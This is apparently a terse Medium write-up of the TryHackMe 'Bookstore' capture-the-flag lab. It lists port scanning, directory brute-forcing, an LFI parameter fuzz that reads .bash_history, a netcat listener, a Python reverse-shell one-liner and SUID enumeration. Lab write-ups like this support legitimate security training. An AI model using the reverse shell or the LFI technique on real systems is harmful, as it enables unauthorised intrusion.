Bookstore — TryHackMe — WriteUp

nmap -A -T4 -v -p- <ip>

website
page source of /books
decode
decode
rabbit hole
/login
page source
port 5000

gobuster dir -u http://<ip>:5000 -w /path-to-wordlist

gobuster
robots.txt
/console
/api
LFI

wfuzz -c -f bookstore.txt -u “http://<ip>:5000/api/v1/resources/books?FUZZ=.bash_history” -w /path-to-wordlist -t 100 2>/dev/null — hc 404

wfuzz

http://<ip>:5000/api/v1/resources/books?the-parameter=.bash_history

LFI
/console

nc –lvnp 4444

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<ip> “,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/bash”)

shell
user flag
sudo -l

find / -perm -u=s 2>/dev/null

SUID

scp try-harder user-name@<ip>:/home/username

ghidra
formula

HAPPY HACKING

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store